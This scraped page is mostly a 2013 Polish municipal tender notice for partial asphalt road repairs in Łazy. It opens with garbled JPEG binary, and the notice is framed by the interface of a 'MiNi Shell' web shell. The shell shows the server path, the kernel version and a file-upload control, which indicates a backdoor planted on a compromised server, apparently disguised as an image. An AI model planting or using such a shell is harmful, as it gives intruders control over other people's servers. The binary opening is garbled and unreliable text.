JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130305/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130305/34151-N-2013.html

<p class="kh_header"><b>Łazy: REMONT CZĄSTKOWY DRÓG  NA TERENIE MIASTA I GMINY ŁAZY O NAWIERZCHNIACH  ASFALTOWYCH W ROKU 2013</b><br>
<b>Numer ogłoszenia: 34151 - 2013; data zamieszczenia: 05.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina  Łazy , ul. Traugutta 15, 42-450 Łazy, woj. śląskie, tel. 32 6729326, faks 32 67 29 326.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.lazy.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> REMONT CZĄSTKOWY DRÓG  NA TERENIE MIASTA I GMINY ŁAZY O NAWIERZCHNIACH  ASFALTOWYCH W ROKU 2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Remont polega na: 
a) likwidacja ubytków, pęknięć, spękań siatkowych i innych uszkodzeń  wynikłych     z uszkodzeń po okresie zimowym w nawierzchniach bitumicznych  poprzez wbudowanie mieszaniny grysowo - emulsyjnej  pod ciśnieniem za pomocą  remonterów drogowych; Wykonanie uzależnione będzie od potrzeb jakie wynikną  po okresie zimowym Szacuje się wykonanie remontu o łącznej powierzchni łat ok. 1 950 m2 
Wielkość łat zróżnicowana . Powyższa ilość ma charakter szacunkowy  i została podana  w celu realnej oceny ofert i wyboru najkorzystniejszej oferty według obiektywnych wskaźników. 
b) likwidacja ubytków, pęknięć, spękań siatkowych i innych uszkodzeń  wynikłych z uszkodzeń po okresie zimowym w nawierzchniach asfaltowych  z wycinaniem uszkodzonego miejsca nawierzchni  oraz ewentualnym uzupełnieniem podbudowy tłuczniem i uzupełnieniem podbudowy mieszanką mineralno-bitumiczną. 
Wykonanie uzależnione będzie od potrzeb jakie wynikną  po okresie zimowym        Szacuje się wykonanie remontu o łącznej powierzchni łat ok. 250 m2 
Wielkość łat zróżnicowana . Powyższa ilość ma charakter szacunkowy  i została podana  w celu realnej oceny ofert i wyboru najkorzystniejszej oferty według obiektywnych wskaźników. 

2.Zamawiający zastrzega sobie prawo zmian ilościowych m2 dotyczących 	wykonania poszczególnych rodzajów remontów (w wielkości do 30%) w ramach maksymalnej kwoty umowy a Wykonawcy nie będą przysługiwały z tego tytułu żadne roszczenia finansowe wobec Zamawiającego.

3.Wykonawca nie będzie wnosił  żadnych roszczeń  w przypadku zlecenia przez 	Zamawiającego zakresu robót mniejszego niż wykazane  w dokumentach przetargowych ilości 	szacunkowe.
Wykonawca otrzyma jedynie zapłatę należną mu z tytułu faktycznie wykonanych m2  danego rodzaju remontów . 
4.(CPV):  45233142-6  roboty w zakresie naprawy dróg
5.Szczegółowy opis przedmiotu zamówienia zawierają  specyfikacje techniczne, stanowiące integralną część niniejszej specyfikacji istotnych warunków zamówienia.

6.W trakcie wykonywania prac remontowych Wykonawca  zobowiązany jest do usuwania na bieżąco nadmiaru zalegającego materiału i innych nieczystości związanych z realizacją w/w robót w taki sposób, aby zapewnić bezpieczeństwo w ruchu drogowym wszystkim użytkownikom drogi.

7.Wykonawca udzieli gwarancji jakości na wykonane roboty na okres co najmniej 12 miesięcy, licząc od dnia odbioru końcowego.
	
8.Wykonawca wykona przedmiot zamówienia z materiałów własnych.Wszelkie stosowane materiały powinny być nowe, odpowiadać Polskim Normom lub Aprobatom Technicznym oraz posiadać dokumenty takie jak: atest, świadectwo, certyfikat zgodności. Użyte w Specyfikacji Technicznej Wykonania i Odbioru Robót znaki towarowe, patenty lub pochodzenie należy rozumieć jako wzorzec jakościowy.Określenie przedmiotu zamówienia poprzez wskazanie nazwy producenta, typu urządzenia, sprzętu lub materiałów ma na celu doprecyzowanie przedmiotu zamówienia.

9.Zamawiający dopuszcza możliwość zastosowania rozwiązań równoważnych, pod warunkiem, że zaproponowane rozwiązania równoważne będą posiadały wszystkie parametry nie gorsze niż te, które są określone w przedmiotowych dokumentach (Specyfikacja Techniczna Wykonania i Odbioru Robót).

10.W przypadku zaoferowania materiałów równoważnych, Wykonawca jest zobowiązany do załączenia do oferty wykazu wyspecyfikowanych wszystkich tych  materiałów wraz z podaniem nazwy producenta, dokładnego i jednoznacznego typu materiału oraz załączenia stosowanych dokumentów takich jak: atest PZH, deklaracja zgodności producenta/aprobata techniczna, karta katalogowa producenta zawierających wszystkie parametry techniczno-eksploatacyjne.

11.Zamawiający dopuszcza zatrudnienie przez Wykonawcę podwykonawców na wykonanie przedmiotu zamówienia. Jeżeli Wykonawca zamierza powierzyć podwykonawcom wykonanie części zamówienia, Zamawiający żąda aby Wykonawca wskazał w swojej ofercie tę część zamówienia, którą zamierza powierzyć podwykonawcom..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> ZAMAWIAJĄCY NIE ŻĄDA WNIESIENIA WADIUM</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. W celu potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy Prawo zamówień publicznych wykonawcy dostarczą:1)aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału   w postępowaniu o udzielenie zamówienia albo składania ofert
(W przypadku wspólnego  ubiegania się o udzielenie niniejszego zamówienia przez 	dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty 	dla każdego z nich); 
DOKUMENTY PODMIOTÓW ZAGRANICZNYCH
1.Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentów, o których mowa w Rozdziale 6 ust. 2   pkt 2) specyfikacji istotnych warunków zamówienia, składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: 

1) nie otwarto jego likwidacji ani nie ogłoszono upadłości; 
2) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne lub 
zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie 	na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu; 
3) nie orzeczono wobec niego zakazu ubiegania się o zamówienie. 

2.Dokumenty, o których mowa w  pkt 1) i 3) powyższego ustępu powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokument, o którym mowa w  pkt 2)powyższego ustępu , powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert 

3.Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ust. 1 pkt 1), 2), 3) , zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji Wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem. 
WYJAŚNIENIE POWIĄZAŃ ISTNIEJĄCYCH MIĘDZY PRZEDSIĘBIORCAMI NALEŻĄCYMI DO TEJ SAMEJ GRUPY KAPITAŁOWEJ

1)Wykonawca, wraz z ofertą, składa listę podmiotów należących do tej samej grupy kapitałowej,  o której mowa w pkt 2), albo informację o tym, że nie należy do grupy kapitałowej. 
Ww. informację należy złożyć na druku oświadczenia stanowiącym załącznik
nr 2 do SIWZ.
2)Zamawiający wykluczy Wykonawców, którzy należąc do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. Nr 50, poz. 331, z późn. zm.), złożyli odrębne oferty w tym samym postępowaniu, chyba że wykażą, że istniejące między nimi powiązania nie prowadzą do zachwiania uczciwej konkurencji pomiędzy Wykonawcami w postępowaniu o udzielenie zamówienia 
3)Zgodnie z art. 4 pkt 14 ustawy z dnia 16 lutego 2007r. o ochronie konkurencji        i konsumentów (Dz. U. 2007r., Nr 50, poz. 331 ze zm.) pod pojęciem grupa kapitałowa - rozumie się wszystkich przedsiębiorców, którzy są kontrolowani w sposób bezpośredni lub pośredni przez jednego przedsiębiorcę, w tym również tego przedsiębiorcę. 
4)Zgodnie z art. 4 pkt 1 ww. ustawy pod pojęciem przedsiębiorca - rozumie się przedsiębiorcę w rozumieniu przepisów o swobodzie działalności gospodarczej, a także: 
a) osobę fizyczną, osobę prawną, a także jednostkę organizacyjną niemającą osobowości prawnej, której ustawa przyznaje zdolność prawną, organizującą lub świadczącą usługi o charakterze użyteczności publicznej, które nie są działalnością gospodarczą w rozumieniu przepisów o swobodzie działalności gospodarczej, 
b) osobę fizyczną wykonującą zawód we własnym imieniu i na własny rachunek lub 	prowadzącą działalność w ramach wykonywania takiego zawodu, 
c) osobę fizyczną, która posiada kontrolę, w rozumieniu art. 4 pkt 4 ustawy o ochronie konkurencji i konsumentów, nad co najmniej jednym przedsiębiorcą, choćby nie prowadziła działalności gospodarczej w rozumieniu przepisów o swobodzie działalności 	gospodarczej, jeżeli podejmuje dalsze działania podlegające kontroli koncentracji, o której mowa w art. 13 ustawy o ochronie konkurencji i konsumentów, 
d) związek przedsiębiorców w rozumieniu art. 4 pkt 2 ustawy o ochronie konkurencji  i konsumentów - na potrzeby przepisów dotyczących praktyk ograniczających 	konkurencję oraz praktyk naruszających zbiorowe interesy konsumentów. 
5)Zamawiający zwróci się do Wykonawcy o udzielenie w określonym terminie wyjaśnień dotyczących powiązań, o których mowa w pkt 2) powyżej, istniejących między przedsiębiorcami,  w celu ustalenia, czy zachodzą przesłanki Wykluczenia wykonawcy. 
6)Zamawiający, oceniając wyjaśnienia, bierze pod uwagę obiektywne czynniki,         w szczególności wpływ powiązań, o których mowa w pkt 2) powyżej, istniejących między przedsiębiorcami, na ich zachowania w postępowaniu oraz przestrzeganie zasady uczciwej konkurencji. 
7)Zamawiający wykluczy z postępowania o udzielenie zamówienia Wykonawcę, który nie złożył wyjaśnień, oraz Wykonawcę, który nie złożył listy, o której mowa w pkt 1) powyżej. 
1.Ofertę stanowi: 
a) wypełniony  formularz ofertowy- według wzoru Załącznik nr 1 do SIWZ;
b) wymagane oświadczenia i dokumenty wymienione w rozdziale 6 niniejszej SIWZ;
c) wypełniony formularz cenowy
d) pełnomocnictwo, o ile nie wynika ono z bezpośrednio przedstawionych dokumentów.
POLEGANIE NA ZASOBACH INNYCH PODMIOTÓW
Wykonawca może polegac na wiedzy i doswiadczeniu, potencjale technicznym,
osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych 	podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. 	Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiajacemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności 	przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu     do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu 	zamówienia.oraz wykazać, że nie zachodzą wobec nich okoliczności wskazane          w art.24 ust.1 - o ile podmioty te będą brały udział w realizacji części zamówienia. Jeżeli Wykonawca wykazując spełnianie warunków udziału w postępowaniu, o których mowa  w art. 22 ust. 1 ustawy polega na zasobach innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu  w zakresie wymaganym dla Wykonawcy, określonym w ust. 2 pkt 1) i 2) Rozdziału 6 SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Strony ustalają, że nie przewidują zmian postanowień umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy z wyjątkiem zmian, których konieczność wprowadzenia wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, lub zmiany te są korzystne dla Zamawiającego, a nadto gdy:
a) nastąpią zmiany techniczne lub organizacyjne,
b) wystąpienia siły wyższej (klęski żywiołowe, strajki), mającej wpływ na wykonanie  niniejszej umowy,	
c) zmiany danych podmiotowych Wykonawcy,	
f) nastąpią zmiany ilościowe m2 dotyczących wykonania poszczególnych rodzajów remontów (w wielkości do 30%) w ramach maksymalnej kwoty umowy określonej w §1 ust. 1 pkt 2.1. 
g) nastąpi zmiana terminu realizacji przedmiotu zamówienia z przyczyn niemożliwych wcześniej do przewidzenia (opady atmosferyczne ciągłe przez min 7 dni). Zamawiający zawiesza wówczas wykonanie terminu. Zawieszenie terminu następuje w protokole spisanym przez Wykonawcę i Zamawiającego na tę okoliczność, potwierdzonym przez Inspektora nadzoru.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.lazy.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację istotnych warunków zamówienia można uzyskać pod adresem 	Zamawiającego,  pokój 304..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.03.2013 godzina 10:00, miejsce: Oferty należy składać w siedzibie Zamawiającego:  Urząd Miejski w Łazach 
ul. Traugutta 15,42-450 Łazy  - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Maksymalna liczba Wykonawców, z którymi Zamawiający zawrze umowę ramową, jeżeli Zamawiający przewiduje zawarcie umowy ramowej.
Zamawiający nie przewiduje zawarcia umowy ramowej.
2. Informacja o zamiarze ustanowienia dynamicznego systemu zakupów wraz z adresem strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów.
Zamawiający nie przewiduje ustanowienia dynamicznego systemu zakupów.
3. Informacje o przewidywanym wyborze najkorzystniejszej oferty z    zastosowaniem aukcji elektronicznej, jeżeli Zamawiający przewiduje aukcję elektroniczną.
Zamawiający nie przewiduje zastosowania aukcji elektronicznej.
4. Informacja o zamiarze zawarcia umowy ramowej.
Zamawiający nie przewiduje zawarcia umowy ramowej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com